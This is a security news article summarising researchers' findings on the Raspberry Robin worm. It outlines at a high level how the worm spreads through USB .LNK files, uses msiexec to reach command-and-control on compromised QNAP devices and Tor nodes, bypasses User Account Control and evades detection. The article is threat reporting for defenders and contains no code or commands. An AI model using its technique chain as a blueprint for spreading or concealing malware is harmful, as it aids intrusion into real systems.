Raspberry Robin worm samples use Windows Installer to drop malware

New Windows malware with worm functions spreads using external USB drives

New malware samples using infected USB drives named Raspberry Robin worm

Red Canary researchers noted the new malware with worm capabilities that is distributed by external drives that leverage Windows Installer.^[1] Exploiting the installer allows to reach the QNAP-associated domains and download the malicious DLL on the machine.^[2] The researchers link the new malware to a Raspberry Robin cluster of malicious operations.^[3] First, these operations were discovered in September 2021.

The worm was detected in various networks of the customers related to the technology and manufacturing sectors. Raspberry Robin malware spreads to Windows systems when the infected USB drive with the malicious .LNK file is connected to the machine. The worm then can process using the CMD to launch the malicious file stored on the external drive.

These procedures are followed by launching explorer.exe and msiexec.exe. These files are used for the external network communication to a rogue domain for the command-and-control purpose and to download, and install the DLL file. The malicious file is loaded and executed using a chain of legitimate Windows utilities. This helps to bypass the User Account Control.^[4]

Unknown objectives of attackers

The Raspberry Robin malware also uses various processes and files to find IP addresses associated with Tor nodes^[5]. It is unknown how these attackers operate, and there is no info on this malware and its end-stage tasks. It can be carried out offline, as researchers speculate and wonder what the particular attempts and possible objectives are:

We have several intelligence gaps around this cluster, including the operators’ objectives.

It is possible that threat actors are financially motivated or install malicious DLLs with the purpose to establish persistence on the infected systems. Red Canary researchers analyzed these newly discovered samples^[6] and how malware acts in infected systems. There are a lot of questions because it is not clear how or where these external drives get infected.

Using legitimate Windows tools

The particular operations and execution are consistent with the Raspberry Robin worm detections before. There are various worm-like capabilities and malicious activities. The malware uses mixed-case letters in command to avoid detection. The secondary execution uses the Microsoft Standard Installer to reach out to the command and control servers that are hosted on the compromised QNAP devices and use TOR exit nodes as the additional C2 infrastructure.

While msiexec.exe command downloads the legitimate installer packages and launches them, adversaries leverage it to deliver malicious files. It is used to connect to the malicious domain. The persistence can be ensured with the additional installation of malicious DLL files and compromising more parts of the machine, system files, and folders.

Typically worms are often used as the attack vectors that deliver secondary malware like ransomware or keyloggers and other information-stealing viruses. There are various malicious commands, however, that Raspberry Robin can execute n the infected machines and networks.

Since there are many unanswered questions about the particular targets and goals of these malicious operations, there might be an issue later on with the usage of these methods observed with these detected samples. Or particular attack campaigns spreading in the wild. As Red Canary researchers note, it is very important to inform the community and learn about the threat, so similar activities can be tracked and stopped before major consequences occur.